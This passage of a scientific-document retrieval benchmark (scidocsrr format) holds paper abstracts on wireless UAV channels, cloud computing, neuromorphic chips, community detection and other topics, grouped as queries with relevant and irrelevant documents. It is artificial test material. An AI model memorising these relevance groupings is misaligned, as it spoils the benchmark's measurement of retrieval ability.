"text": "We consider the problem of mitigating a highly varying wireless channel between a transmitting ground node and receivers on a small, low-altitude unmanned aerial vehicle (UAV) in a 802.11 wireless mesh network. One approach is to use multiple transmitter and receiver nodes that exploit the channel's spatial/temporal diversity and that cooperate to improve overall packet reception. We present a series of measurement results from a real-world testbed that characterize the resulting wireless channel. We show that the correlation between receiver nodes on the airplane is poor at small time scales so receiver diversity can be exploited. Our measurements suggest that using several receiver nodes simultaneously can boost packet delivery rates substantially. Lastly, we show that similar results apply to transmitter selection diversity as well.",
"title": ""
},
{
"docid": "b4533cd83713a94f00239857c0ff29a5",
"text": "Nowadays, IT community is experiencing great shift in computing and information storage infrastructures by using powerful, flexible and reliable alternative of cloud computing. The power of cloud computing may also be realized for mankind if some dedicated disaster management clouds will be developed at various countries cooperating each other on some common standards. The experimentation and deployment of cloud computing by governments of various countries for mankind may be the justified use of IT at social level. It is possible to realize a real-time disaster management cloud where applications in cloud will respond within a specified time frame. If a Real-Time Cloud (RTC) is available then for intelligent machines like robots the complex processing may be done on RTC via request and response model. The complex processing is more desirable as level of intelligence increases in robots towards humans even more. Therefore, it may be possible to manage disaster sites more efficiently with more intelligent cloud robots without great lose of human lives waiting for various assistance at disaster site. Real-time garbage collector, real-time specification for Java, multicore CPU architecture with network-on-chip, parallel algorithms, distributed algorithms, high performance database systems, high performance web servers and gigabit networking can be used to develop real-time applications in cloud.",
"title": ""
},
{
"docid": "6c584b512e51b3dd4f16a9c753ac2fc5",
"text": "Cloud computing and virtualization technologies play important roles in modern service-oriented computing paradigm. More conventional services are being migrated to virtualized computing environments to achieve flexible deployment and high availability. We introduce a schedule algorithm based on fuzzy inference system (FIS), for global container resource allocation by evaluating nodes' statuses using FIS. We present the approaches to build containerized test environment and validates the effectiveness of the resource allocation policies by running sample use cases. Experiment results show that the presented infrastructure and schema derive optimal resource configurations and significantly improves the performance of the cluster.",
"title": ""
},
{
"docid": "3bc9e52cd4bbce80d45c7f89b20284b0",
"text": "Many tasks in computational linguistics traditionally rely on hand-crafted or curated resources like thesauri or word-sense-annotated corpora. The availability of big data, from the Web and other sources, has changed this situation. Harnessing these assets requires scalable methods for data and text analytics. This paper gives an overview on our recent work that utilizes big data methods for enhancing semantics-centric tasks dealing with natural language texts. We demonstrate a virtuous cycle in harvesting knowledge from large data and text collections and leveraging this knowledge in order to improve the annotation and interpretation of language in Web pages and social media. Specifically, we show how to build large dictionaries of names and paraphrases for entities and relations, and how these help to disambiguate entity mentions in texts.",
"title": ""
},
{
"docid": "1c9644fa4e259da618d5371512f1e73d",
"text": "Suicidal behavior is a leading cause of injury and death worldwide. Information about the epidemiology of such behavior is important for policy-making and prevention. The authors reviewed government data on suicide and suicidal behavior and conducted a systematic review of studies on the epidemiology of suicide published from 1997 to 2007. The authors' aims were to examine the prevalence of, trends in, and risk and protective factors for suicidal behavior in the United States and cross-nationally. The data revealed significant cross-national variability in the prevalence of suicidal behavior but consistency in age of onset, transition probabilities, and key risk factors. Suicide is more prevalent among men, whereas nonfatal suicidal behaviors are more prevalent among women and persons who are young, are unmarried, or have a psychiatric disorder. Despite an increase in the treatment of suicidal persons over the past decade, incidence rates of suicidal behavior have remained largely unchanged. Most epidemiologic research on suicidal behavior has focused on patterns and correlates of prevalence. The next generation of studies must examine synergistic effects among modifiable risk and protective factors. New studies must incorporate recent advances in survey methods and clinical assessment. Results should be used in ongoing efforts to decrease the significant loss of life caused by suicidal behavior.",
"title": ""
},
{
"docid": "21002b649f123b61b99f9167952b5888",
"text": "Transposable elements and retroviruses are found in most genomes, can be pathogenic and are widely used as gene-delivery and functional genomics tools. Exploring whether these genetic elements target specific genomic sites for integration and how this preference is achieved is crucial to our understanding of genome evolution, somatic genome plasticity in cancer and ageing, host–parasite interactions and genome engineering applications. High-throughput profiling of integration sites by next-generation sequencing, combined with large-scale genomic data mining and cellular or biochemical approaches, has revealed that the insertions are usually non-random. The DNA sequence, chromatin and nuclear context, and cellular proteins cooperate in guiding integration in eukaryotic genomes, leading to a remarkable diversity of insertion site distribution and evolutionary strategies.",
"title": ""
}
] | scidocsrr |
a86d82afa0c2f7e355d4403bf08eb7df | Semantic Interaction for Visual Analytics: Inferring Analytical Reasoning for Model Steering | [
{
"docid": "82c225478a98679348c3c20810a8d13d",
"text": "Visual analytic tools aim to support the cognitively demanding task of sensemaking. Their success often depends on the ability to leverage capabilities of mathematical models, visualization, and human intuition through flexible, usable, and expressive interactions. Spatially clustering data is one effective metaphor for users to explore similarity and relationships between information, adjusting the weighting of dimensions or characteristics of the dataset to observe the change in the spatial layout. Semantic interaction is an approach to user interaction in such spatializations that couples these parametric modifications of the clustering model with users' analytic operations on the data (e.g., direct document movement in the spatialization, highlighting text, search, etc.). In this paper, we present results of a user study exploring the ability of semantic interaction in a visual analytic prototype, ForceSPIRE, to support sensemaking. We found that semantic interaction captures the analytical reasoning of the user through keyword weighting, and aids the user in co-creating a spatialization based on the user's reasoning and intuition.",
"title": ""
}
] | [
{
"docid": "f322c2d3ab7db46feeceec2a6336cf6b",
"text": "Robust and accurate visual tracking is one of the most challenging computer vision problems. Due to the inherent lack of training data, a robust approach for constructing a target appearance model is crucial. The existing spatially regularized discriminative correlation filter (SRDCF) method learns partial-target information or background information when experiencing rotation, out of view, and heavy occlusion. In order to reduce the computational complexity by creating a novel method to enhance tracking ability, we first introduce an adaptive dimensionality reduction technique to extract the features from the image, based on pre-trained VGG-Net. We then propose an adaptive model update to assign weights during an update procedure depending on the peak-to-sidelobe ratio. Finally, we combine the online SRDCF-based tracker with the offline Siamese tracker to accomplish long term tracking. Experimental results demonstrate that the proposed tracker has satisfactory performance in a wide range of challenging tracking scenarios.",
"title": ""
},
{
"docid": "e210c3e4a5dbd49192aca2161b44c3c6",
"text": "The purpose of this paper is to develop a novel hybrid optimization method (HRABC) based on artificial bee colony algorithm and Taguchi method. The proposed approach is applied to a structural design optimization of a vehicle component and a multi-tool milling optimization problem. A comparison of state-of-the-art optimization techniques for the design and manufacturing optimization problems is presented. The results have demonstrated the superiority of the HRABC over the other",
"title": ""
},
{
"docid": "2efd26fc1e584aa5f70bdf9d24e5c2cd",
"text": "Bridging cultures that have often been distant, Julia combines expertise from the diverse fields of computer science and computational science to create a new approach to numerical computing. Julia is designed to be easy and fast and questions notions generally held to be “laws of nature” by practitioners of numerical computing: 1. High-level dynamic programs have to be slow. 2. One must prototype in one language and then rewrite in another language for speed or deployment. 3. There are parts of a system appropriate for the programmer, and other parts that are best left untouched as they have been built by the experts. We introduce the Julia programming language and its design—a dance between specialization and abstraction. Specialization allows for custom treatment. Multiple dispatch, a technique from computer science, picks the right algorithm for the right circumstance. Abstraction, which is what good computation is really about, recognizes what remains the same after differences are stripped away. Abstractions in mathematics are captured as code through another technique from computer science, generic programming. Julia shows that one can achieve machine performance without sacrificing human convenience.",
"title": ""
},
{
"docid": "59ba83e88085445e3bcf009037af6617",
"text": "— We examine the relationship between resource abundance and several indicators of human welfare. Consistent with the existing literature on the relationship between resource abundance and economic growth we find that, given an initial income level, resource-intensive countries tend to suffer lower levels of human development. While we find only weak support for a direct link between resources and welfare, there is an indirect link that operates through institutional quality. There are also significant differences in the effects that resources have on different measures of institutional quality. These results imply that the ‘‘resource curse’’ is a more encompassing phenomenon than previously considered, and that key differences exist between the effects of different resource types on various aspects of governance and human welfare. 2005 Elsevier Ltd. All rights reserved.",
"title": ""
},
{
"docid": "a72c9eb8382d3c94aae77fa4eadd1df8",
"text": "Techniques for identifying the author of an unattributed document can be applied to problems in information analysis and in academic scholarship. A range of methods have been proposed in the research literature, using a variety of features and machine learning approaches, but the methods have been tested on very different data and the results cannot be compared. It is not even clear whether the differences in performance are due to feature selection or other variables. In this paper we examine the use of a large publicly available collection of newswire articles as a benchmark for comparing authorship attribution methods. To demonstrate the value of having a benchmark, we experimentally compare several recent feature-based techniques for authorship attribution, and test how well these methods perform as the volume of data is increased. We show that the benchmark is able to clearly distinguish between different approaches, and that the scalability of the best methods based on using function words features is acceptable, with only moderate decline as the difficulty of the problem is increased.",
"title": ""
},
{
"docid": "60fe7f27cd6312c986b679abce3fdea7",
"text": "In matters of great importance that have financial, medical, social, or other implications, we often seek a second opinion before making a decision, sometimes a third, and sometimes many more. In doing so, we weigh the individual opinions, and combine them through some thought process to reach a final decision that is presumably the most informed one. The process of consulting \"several experts\" before making a final decision is perhaps second nature to us; yet, the extensive benefits of such a process in automated decision making applications have only recently been discovered by computational intelligence community. Also known under various other names, such as multiple classifier systems, committee of classifiers, or mixture of experts, ensemble based systems have shown to produce favorable results compared to those of single-expert systems for a broad range of applications and under a variety of scenarios. Design, implementation and application of such systems are the main topics of this article. Specifically, this paper reviews conditions under which ensemble based systems may be more beneficial than their single classifier counterparts, algorithms for generating individual components of the ensemble systems, and various procedures through which the individual classifiers can be combined. We discuss popular ensemble based algorithms, such as bagging, boosting, AdaBoost, stacked generalization, and hierarchical mixture of experts; as well as commonly used combination rules, including algebraic combination of outputs, voting based techniques, behavior knowledge space, and decision templates. Finally, we look at current and future research directions for novel applications of ensemble systems. Such applications include incremental learning, data fusion, feature selection, learning with missing features, confidence estimation, and error correcting output codes; all areas in which ensemble systems have shown great promise",
"title": ""
},
{
"docid": "a7284bfc38d5925cb62f04c8f6dcaae2",
"text": "The brain's electrical signals enable people without muscle control to physically interact with the world.",
"title": ""
},
{
"docid": "8e6d1461b53b9f589532e27f0fa59a71",
"text": "Community structure describes the organization of a network into subgraphs that contain a prevalence of edges within each subgraph and relatively few edges across boundaries between subgraphs. The development of community-detection methods has occurred across disciplines, with numerous and varied algorithms proposed to find communities. As we present in this Chapter via several case studies, community detection is not just an “end game” unto itself, but rather a step in the analysis of network data which is then useful for furthering research in the disciplinary domain of interest. These case-study examples arise from diverse applications, ranging from social and political science to neuroscience and genetics, and we have chosen them to demonstrate key aspects of community detection and to highlight that community detection, in practice, should be directed by the application at hand. Most networks representing real-world systems display community structure, and many visualizations of networks lend themselves naturally to observations about groups of nodes that appear to be more connected to each other than to the rest of the network. One might be reasonably curious about why this is such a common feature across a great variety of real networks, and even more intriguingly, what do the groups mean? Considering examples from different disciplines, one can observe that these groups (or communities) often have important roles in the organization of a network. For example, in a social network where nodes represent individuals and edges describe friendships between them, communities can correspond to groups of people with shared interests (Granovetter, 1973; McPherson et al., 2001; Moody and White, 2003; Zachary, 1977). In the graph of the World Wide Web, where a directed edge between web pages represents a hyperlink from one to the other, communities often correspond to webpages with related topics (Flake et al., 2000). In brain networks of interconnected neurons or cortical areas, communities can correspond to specialized functional components such as visual and auditory systems (Sporns and Betzel, 2016). In networks representing interactions among proteins, communities can group together proteins that contribute to the same cellular function (Spirin and Mirny, 2003). Across each of these examples, the communities provide a new level of description of the network, and this intermediate (that is, “mesoscopic”) perspective between the microscopic (nodes) and macroscopic (the whole network) domains proves to be very useful in understanding the essential functionality and organizational principles of a network. In particular, one of the motivations to identify communities in many of the aforementioned applications is that the network structure aligns with data attributes such as age, location, interests, 1 ar X iv :1 70 5. 02 30 5v 1 [ ph ys ic s. so cph ] 5 M ay 2 01 7 health, race, sex and so on. However, congruent with most community-detection algorithms, we refer to structural communities in which there is a prevalence of edges between nodes in the same community versus those between communities. Importantly, this notion is a topological property of the network and is agnostic to attributes. In principle, one can choose other definitions for what constitutes a community, and we note that for attributed (also called annotated) networks there is growing interest in developing community-detection algorithms that utilize both structural and attribute information (Binkiewicz et al., 2014; Bothorel et al., 2015; Newman and Clauset, 2016; Peel et al., 2017; Yang et al., 2013). While here we do not explore these possibilities, and focus our attention on communities in the topological sense, it is important to note that there is often positive correlation between community structure and attribute information due to homophily (Aral et al., 2009; McPherson et al., 2001)—that is, edges exist preferentially between nodes with similar attributes. Generally speaking, studying the interplay between attribute information and network structure is complicated due to confounding effects (Shalizi and Thomas, 2011). Detecting communities in an automated manner is not a simple pursuit, first, because although the qualitative notions of communities may be intuitive, translating such ideas into an appropriate modeling framework can be challenging. In particular, various applications call for different notions of a community, each producing a different mesoscopic description of a network. Second, the computational complexity of community detection can be a fundamental issue; for example, the number of possible partitions of nodes into non-overlapping groups is non-polynomial in the size of the network (and allowing overlapping communities increases the number of possibilities), motivating important work on different heuristics for efficiently identifying communities. Such challenges make community detection one of the most complex—yet fascinating—areas of network science, with a huge and ever increasing number of different algorithms available in the literature. We only indicate a few classes of community-detection methods here, referring the reader to comprehensive community-detection reviews by Porter, Onnela, and Mucha (2009); Fortunato (2010); and Fortunato and Hric (2016) (see also a recent review by Schaub et al., 2017, on the conceptual differences between different perspectives on community detection). While the ideas of community detection have been around in sociology for decades (see, e.g., Coleman, 1964; Freeman, 2004; Moody and White, 2003), the field has benefited from significant contributions across numerous disciplines, proposing a variety of methods and algorithms for automating community detection. Graph partitioning (e.g., Barnes, 1982; Fiedler, 1973; Kernighan and Lin, 1970; Mahoney et al., 2012) spans a large literature across computer science and mathematics, aiming to divide a network into a specified number of groups so that some selected quantity is optimized, such as the number of edges between the groups (i.e., cut size). Modularity maximization (Newman and Girvan, 2004), a different optimization approach for graph partitioning originating in the physics literature, aims to find the partition with the largest difference between the total weight of within-community edges and that expected under a null model—that is, a random-network model with selected properties. Modularity maximization typically leads to more balanced community sizes, can account for degree heterogeneity in the network, and does not require a priori specification of the number of communities. However, it is well-known to suffer from a resolution limit (Fortunato and Barthélemy, 2007), and it is not at all clear how to best interpret the different numbers of communities that can be obtained by varying resolution parameters (Arenas et al., 2008b; Reichardt and Bornholdt, 2006). Statistical inference (e.g., Ball et al., 2011; Hastings, 2006; Karrer and Newman, 2011; Peixoto, 2013, 2014), arising from the statistics literature, typically aims to identify a parametrized generative model that describes the network (e.g., with maximum likelihood). For example, stochastic",
"title": ""
},
{
"docid": "8f3497ecbe4c4687a1bc669c8933b556",
"text": "Many problems in multi-view geometry, when posed as minimization of the maximum reprojection error across observations, can be solved optimally in polynomial time. We show that these problems are instances of a convex-concave generalized fractional program. We survey the major solution methods for solving problems of this form and present them in a unified framework centered around a single parametric optimization problem. We propose two new algorithms and show that the algorithm proposed by Olsson et al. [21] is a special case of a classical algorithm for generalized fractional programming. The performance of all the algorithms is compared on a variety of datasets, and the algorithm proposed by Gugat [12] stands out as a clear winner. An open source MATLAB toolbox that implements all the algorithms presented here is made available.",
"title": ""
},
{
"docid": "ff5d8069062073285e1770bfae096d7e",
"text": "As Face Recognition(FR) technology becomes more mature and commercially available in the market, many different anti-spoofing techniques have been recently developed to enhance the security, reliability, and effectiveness of FR systems. As a part of anti-spoofing techniques, face liveness detection plays an important role to make FR systems be more secured from various attacks. In this paper, we propose a novel method for face liveness detection by using focus, which is one of camera functions. In order to identify fake faces (e.g. 2D pictures), our approach utilizes the variation of pixel values by focusing between two images sequentially taken in different focuses. The experimental result shows that our focus-based approach is a new method that can significantly increase the level of difficulty of spoof attacks, which is a way to improve the security of FR systems. The performance is evaluated and the proposed method achieves 100% fake detection in a given DoF(Depth of Field).",
"title": ""
},
{
"docid": "3c732abd9fc153a64a53dba098e9bbea",
"text": "Automatic image description systems are commonly trained and evaluated on large image description datasets. Recently, researchers have started to collect such datasets for languages other than English. An unexplored question is how different these datasets are from English and, if there are any differences, what causes them to differ. This paper provides a crosslinguistic comparison of Dutch, English, and German image descriptions. We find that these descriptions are similar in many respects, but the familiarity of crowd workers with the subjects of the images has a noticeable influence on description specificity.",
"title": ""
},
{
"docid": "c582e3c1f3896e5f86b0d322184582fd",
"text": "The interest for data mining techniques has increased tremendously during the past decades, and numerous classification techniques have been applied in a wide range of business applications. Hence, the need for adequate performance measures has become more important than ever. In this paper, a cost-benefit analysis framework is formalized in order to define performance measures which are aligned with the main objectives of the end users, i.e., profit maximization. A new performance measure is defined, the expected maximum profit criterion. This general framework is then applied to the customer churn problem with its particular cost-benefit structure. The advantage of this approach is that it assists companies with selecting the classifier which maximizes the profit. Moreover, it aids with the practical implementation in the sense that it provides guidance about the fraction of the customer base to be included in the retention campaign.",
"title": ""
},
{
"docid": "e96f7ed55a54b19fe983130b3dd16f7d",
"text": "In this paper, we present an alternative approach to neuromorphic systems based on multilevel resistive memory synapses and deterministic learning rules. We demonstrate an original methodology to use conductive-bridge RAM (CBRAM) devices as, easy to program and low-power, binary synapses with stochastic learning rules. New circuit architecture, programming strategy, and probabilistic spike-timing dependent plasticity (STDP) learning rule for two different CBRAM configurations with-selector (1T-1R) and without-selector (1R) are proposed. We show two methods (intrinsic and extrinsic) for implementing probabilistic STDP rules. Fully unsupervised learning with binary synapses is illustrated through two example applications: 1) real-time auditory pattern extraction (inspired from a 64-channel silicon cochlea emulator); and 2) visual pattern extraction (inspired from the processing inside visual cortex). High accuracy (audio pattern sensitivity > 2, video detection rate > 95%) and low synaptic-power dissipation (audio 0.55 μW, video 74.2 μW) are shown. The robustness and impact of synaptic parameter variability on system performance are also analyzed.",
"title": ""
},
{
"docid": "906659aa61bbdb5e904a1749552c4741",
"text": "The Rete–Match algorithm is a matching algorithm used to develop production systems. Although this algorithm is the fastest known algorithm, for many patterns and many objects matching, it still suffers from considerable amount of time needed due to the recursive nature of the problem. In this paper, a parallel version of the Rete–Match algorithm for distributed memory architecture is presented. Also, a theoretical analysis to its correctness and performance is discussed. q 1998 Elsevier Science B.V. All rights reserved.",
"title": ""
},
{
"docid": "125148cad2e3aef1cf7cb1fb9698f305",
"text": "BACKGROUND\nDental decay is the most common childhood disease worldwide and most of the decay remains untreated. In the Philippines caries levels are among the highest in the South East Asian region. Elementary school children suffer from high prevalence of stunting and underweight.The present study aimed to investigate the association between untreated dental decay and Body Mass Index (BMI) among 12-year-old Filipino children.\n\n\nMETHODS\nData collection was part of the National Oral Health Survey, a representative cross-sectional study of 1951 11-13-year-old school children using a modified, stratified cluster sampling design based on population classifications of the Philippine National Statistics Office. Caries was scored according to WHO criteria (1997) and odontogenic infections using the PUFA index. Anthropometric measures were performed by trained nurses. Some socio-economic determinants were included as potential confounding factors.\n\n\nRESULTS\nThe overall prevalence of caries (DMFT + dmft > 0) was 82.3% (95%CI; 80.6%-84.0%). The overall prevalence of odontogenic infections due to caries (PUFA + pufa > 0) was 55.7% (95% CI; 53.5%-57.9%) The BMI of 27.1% (95%CI; 25.1%-29.1%) of children was below normal, 1% (95%CI; 0.5%-1.4%) had a BMI above normal. The regression coefficient between BMI and caries was highly significant (p < 0.001). Children with odontogenic infections (PUFA + pufa > 0) as compared to those without odontogenic infections had an increased risk of a below normal BMI (OR: 1.47; 95% CI: 1.19-1.80).\n\n\nCONCLUSIONS\nThis is the first-ever representative survey showing a significant association between caries and BMI and particularly between odontogenic infections and below normal BMI. An expanded model of hypothesised associations is presented that includes progressed forms of dental decay as a significant, yet largely neglected determinant of poor child development.",
"title": ""
},
{
"docid": "b7418463f6f0193925299346a5aad680",
"text": "This paper proposes an efficient bitwise solution to the single-channel source separation task. Most dictionary-based source separation algorithms rely on iterative update rules during the run time, which becomes computationally costly especially when we employ an overcomplete dictionary and sparse encoding that tend to give better separation results. To avoid such cost we propose a bitwise scheme on hashed spectra that leads to an efficient posterior probability calculation. For each source, the algorithm uses a partial rank order metric to extract robust features that form a binarized dictionary of hashed spectra. Then, for a mixture spectrum, its hash code is compared with each source's hashed dictionary in one pass. This simple voting-based dictionary search allows a fast and iteration-free estimation of ratio masking at each bin of a signal spectrogram. We verify that the proposed BitWise Source Separation (BWSS) algorithm produces sensible source separation results for the single-channel speech denoising task, with 6–8 dB mean SDR. To our knowledge, this is the first dictionary based algorithm for this task that is completely iteration-free in both training and testing.",
"title": ""
},
{
"docid": "5150c416ac9d5b76e4f712abf65d95f9",
"text": "Despite the advances made in artificial intelligence, software agents, and robotics, there is little we see today that we can truly call a fully autonomous system. We conjecture that the main inhibitor for advancing autonomy is lack of trust. Trusted autonomy is the scientific and engineering field to establish the foundations and ground work for developing trusted autonomous systems (robotics and software agents) that can be used in our daily life, and can be integrated with humans seamlessly, naturally, and efficiently. In this paper, we review this literature to reveal opportunities for researchers and practitioners to work on topics that can create a leap forward in advancing the field of trusted autonomy. We focus this paper on the trust component as the uniting technology between humans and machines. Our inquiry into this topic revolves around three subtopics: (1) reviewing and positioning the trust modeling literature for the purpose of trusted autonomy; (2) reviewing a critical subset of sensor technologies that allow a machine to sense human states; and (3) distilling some critical questions for advancing the field of trusted autonomy. The inquiry is augmented with conceptual models that we propose along the way by recompiling and reshaping the literature into forms that enable trusted autonomous systems to become a reality. This paper offers a vision for a Trusted Cyborg Swarm, an extension of our previous Cognitive Cyber Symbiosis concept, whereby humans and machines meld together in a harmonious, seamless, and coordinated manner.",
"title": ""
},
{
"docid": "a4418b6e010a630a8ae1f10ce23e0ec5",
"text": "While neural machine translation (NMT) has made remarkable progress in recent years, it is hard to interpret its internal workings due to the continuous representations and non-linearity of neural networks. In this work, we propose to use layer-wise relevance propagation (LRP) to compute the contribution of each contextual word to arbitrary hidden states in the attention-based encoderdecoder framework. We show that visualization with LRP helps to interpret the internal workings of NMT and analyze translation errors.",
"title": ""
},
{
"docid": "296705d6bfc09f58c8e732a469b17871",
"text": "Computer security incident response teams (CSIRTs) respond to a computer security incident when the need arises. Failure of these teams can have far-reaching effects for the economy and national security. CSIRTs often have to work on an ad hoc basis, in close cooperation with other teams, and in time constrained environments. It could be argued that under these working conditions CSIRTs would be likely to encounter problems. A needs assessment was done to see to which extent this argument holds true. We constructed an incident response needs model to assist in identifying areas that require improvement. We envisioned a model consisting of four assessment categories: Organization, Team, Individual and Instrumental. Central to this is the idea that both problems and needs can have an organizational, team, individual, or technical origin or a combination of these levels. To gather data we conducted a literature review. This resulted in a comprehensive list of challenges and needs that could hinder or improve, respectively, the performance of CSIRTs. Then, semi-structured in depth interviews were held with team coordinators and team members of five public and private sector Dutch CSIRTs to ground these findings in practice and to identify gaps between current and desired incident handling practices. This paper presents the findings of our needs assessment and ends with a discussion of potential solutions to problems with performance in incident response.",
"title": ""
},
{
"docid": "df20ee9b4d65e104fc090a7c2720a357",
"text": "Contemporary digital game developers offer a variety of games for the diverse tastes of their customers. Although the gaming experience often depends on one's preferences, the same may not apply to the level of their immersion. It has been argued whether the player perspective can influence the level of player's involvement with the game. The aim of this study was to research whether interacting with a game in first person perspective is more immersive than playing in the third person point of view (POV). The set up to test the theory involved participants playing a role-playing game in either mode, naming their preferred perspective, and subjectively evaluating their immersive experience. The results showed that people were more immersed in the game play when viewing the game world through the eyes of the character, regardless of their preferred perspectives.",
"title": ""
}
] | scidocsrr |
4281d725edae0d9db16c5a4abf3ea727 | Improving classification accuracy of feedforward neural networks for spiking neuromorphic chips | [
{
"docid": "8d3e93e59a802535e9d5ef7ca7ace362",
"text": "Marching along the DARPA SyNAPSE roadmap, IBM unveils a trilogy of innovations towards the TrueNorth cognitive computing system inspired by the brain's function and efficiency. Judiciously balancing the dual objectives of functional capability and implementation/operational cost, we develop a simple, digital, reconfigurable, versatile spiking neuron model that supports one-to-one equivalence between hardware and simulation and is implementable using only 1272 ASIC gates. Starting with the classic leaky integrate-and-fire neuron, we add: (a) configurable and reproducible stochasticity to the input, the state, and the output; (b) four leak modes that bias the internal state dynamics; (c) deterministic and stochastic thresholds; and (d) six reset modes for rich finite-state behavior. The model supports a wide variety of computational functions and neural codes. We capture 50+ neuron behaviors in a library for hierarchical composition of complex computations and behaviors. Although designed with cognitive algorithms and applications in mind, serendipitously, the neuron model can qualitatively replicate the 20 biologically-relevant behaviors of a dynamical neuron model.",
"title": ""
},
{
"docid": "5aa10413b995b6b86100585f3245e4d9",
"text": "In this paper, we describe the design of Neurogrid, a neuromorphic system for simulating large-scale neural models in real time. Neuromorphic systems realize the function of biological neural systems by emulating their structure. Designers of such systems face three major design choices: 1) whether to emulate the four neural elements-axonal arbor, synapse, dendritic tree, and soma-with dedicated or shared electronic circuits; 2) whether to implement these electronic circuits in an analog or digital manner; and 3) whether to interconnect arrays of these silicon neurons with a mesh or a tree network. The choices we made were: 1) we emulated all neural elements except the soma with shared electronic circuits; this choice maximized the number of synaptic connections; 2) we realized all electronic circuits except those for axonal arbors in an analog manner; this choice maximized energy efficiency; and 3) we interconnected neural arrays in a tree network; this choice maximized throughput. These three choices made it possible to simulate a million neurons with billions of synaptic connections in real time-for the first time-using 16 Neurocores integrated on a board that consumes three watts.",
"title": ""
}
] | [
{
"docid": "a98f643c2a0e40a767f5ef57b0152adb",
"text": "Techniques for recognizing high-level events in consumer videos on the Internet have many applications. Systems that produced state-of-the-art recognition performance usually contain modules requiring extensive computation, such as the extraction of the temporal motion trajectories, which cannot be deployed on large-scale datasets. In this paper, we provide a comprehensive study on efficient methods in this area and identify technical options for super fast event recognition in Internet videos. We start from analyzing a multimodal baseline that has produced good performance on popular benchmarks, by systematically evaluating each component in terms of both computational cost and contribution to recognition accuracy. After that, we identify alternative features, classifiers, and fusion strategies that can all be efficiently computed. In addition, we also provide a study on the following interesting question: for event recognition in Internet videos, what is the minimum number of visual and audio frames needed to obtain a comparable accuracy to that of using all the frames? Results on two rigorously designed datasets indicate that similar results can be maintained by using only a small portion of the visual frames. We also find that, different from the visual frames, the soundtracks contain little redundant information and thus sampling is always harmful. Integrating all the findings, our suggested recognition system is 2,350-fold faster than a baseline approach with even higher recognition accuracies. It recognizes 20 classes on a 120-second video sequence in just 1.78 seconds, using a regular desktop computer.",
"title": ""
},
{
"docid": "e28b8c08275947f0908f64d117f5dc8e",
"text": "We propose a method for using synthetic data to help learning classifiers. Synthetic data, even is generated based on real data, normally results in a shift from the distribution of real data in feature space. To bridge the gap between the real and synthetic data, and jointly learn from synthetic and real data, this paper proposes a Multichannel Autoencoder(MCAE). We show that by suing MCAE, it is possible to learn a better feature representation for classification. To evaluate the proposed approach, we conduct experiments on two types of datasets. Experimental results on two datasets validate the efficiency of our MCAE model and our methodology of generating synthetic data.",
"title": ""
},
{
"docid": "59daeea2c602a1b1d64bae95185f9505",
"text": "Traumatic brain injury (TBI) triggers endoplasmic reticulum (ER) stress and impairs autophagic clearance of damaged organelles and toxic macromolecules. In this study, we investigated the effects of the post-TBI administration of docosahexaenoic acid (DHA) on improving hippocampal autophagy flux and cognitive functions of rats. TBI was induced by cortical contusion injury in Sprague–Dawley rats, which received DHA (16 mg/kg in DMSO, intraperitoneal administration) or vehicle DMSO (1 ml/kg) with an initial dose within 15 min after the injury, followed by a daily dose for 3 or 7 days. First, RT-qPCR reveals that TBI induced a significant elevation in expression of autophagy-related genes in the hippocampus, including SQSTM1/p62 (sequestosome 1), lysosomal-associated membrane proteins 1 and 2 (Lamp1 and Lamp2), and cathepsin D (Ctsd). Upregulation of the corresponding autophagy-related proteins was detected by immunoblotting and immunostaining. In contrast, the DHA-treated rats did not exhibit the TBI-induced autophagy biogenesis and showed restored CTSD protein expression and activity. T2-weighted images and diffusion tensor imaging (DTI) of ex vivo brains showed that DHA reduced both gray matter and white matter damages in cortical and hippocampal tissues. DHA-treated animals performed better than the vehicle control group on the Morris water maze test. Taken together, these findings suggest that TBI triggers sustained stimulation of autophagy biogenesis, autophagy flux, and lysosomal functions in the hippocampus. Swift post-injury DHA administration restores hippocampal lysosomal biogenesis and function, demonstrating its therapeutic potential.",
"title": ""
},
{
"docid": "df331d60ab6560808e28e3813766b67b",
"text": "Analyzing large graphs provides valuable insights for social networking and web companies in content ranking and recommendations. While numerous graph processing systems have been developed and evaluated on available benchmark graphs of up to 6.6B edges, they often face significant difficulties in scaling to much larger graphs. Industry graphs can be two orders of magnitude larger hundreds of billions or up to one trillion edges. In addition to scalability challenges, real world applications often require much more complex graph processing workflows than previously evaluated. In this paper, we describe the usability, performance, and scalability improvements we made to Apache Giraph, an open-source graph processing system, in order to use it on Facebook-scale graphs of up to one trillion edges. We also describe several key extensions to the original Pregel model that make it possible to develop a broader range of production graph applications and workflows as well as improve code reuse. Finally, we report on real-world operations as well as performance characteristics of several large-scale production applications.",
"title": ""
},
{
"docid": "cddca3a23ea0568988243c8f005e0edc",
"text": "This paper investigates the mechanisms through which organizations develop dynamic capabilities, defined as routinized activities directed to the development and adaptation of operating routines, and reflects upon the role of (1) experience accumulation, (2) knowledge articulation and (3) knowledge codification processes in the evolution of dynamic, as well as operational, routines. The argument is made that dynamic capabilities are shaped by the co-evolution of these learning mechanisms. At any point in time, firms adopt a mix of learning behaviors constituted by a semi-automatic accumulation of experience and by deliberate investments in knowledge articulation and codification activities. The relative effectiveness of these capability-building mechanisms is analyzed here as contingent upon selected features of the task to be learned, such as its frequency, homogeneity and degree of causal ambiguity, and testable hypotheses are derived. Somewhat counterintuitive implications of the analysis include the relatively superior effectiveness of highly deliberate learning processes, such as knowledge codification, at lower levels of frequency and homogeneity of the organizational task, in contrast with common managerial practice.",
"title": ""
},
{
"docid": "4daeec6970f241293a51e93e147a60c3",
"text": "There is a considerable evidence that our perception of sound uses important features which are related to underlying signal modulations. This topic has been studied extensively via perceptual experiments, yet there are few, if any, well-developed signal processing methods which capitalize on or model these effects. We begin by summarizing evidence of the importance of modulation representations from psychophysical, physiological, and other sources. The concept of a two-dimensional joint acoustic and modulation frequency representation is proposed. A simple single sinusoidal amplitude modulator of a sinusoidal carrier is then used to illustrate properties of an unconstrained and ideal joint representation. Added constraints are required to remove or reduce undesired interference terms and to provide invertibility. It is then noted that the constraints would be also applied to more general and complex cases of broader modulation and carriers. Applications in single-channel speaker separation and in audio coding are used to illustrate the applicability of this joint representation. Other applications in signal analysis and filtering are suggested.",
"title": ""
},
{
"docid": "be68f44aca9f8c88c2757a6910d7e5a5",
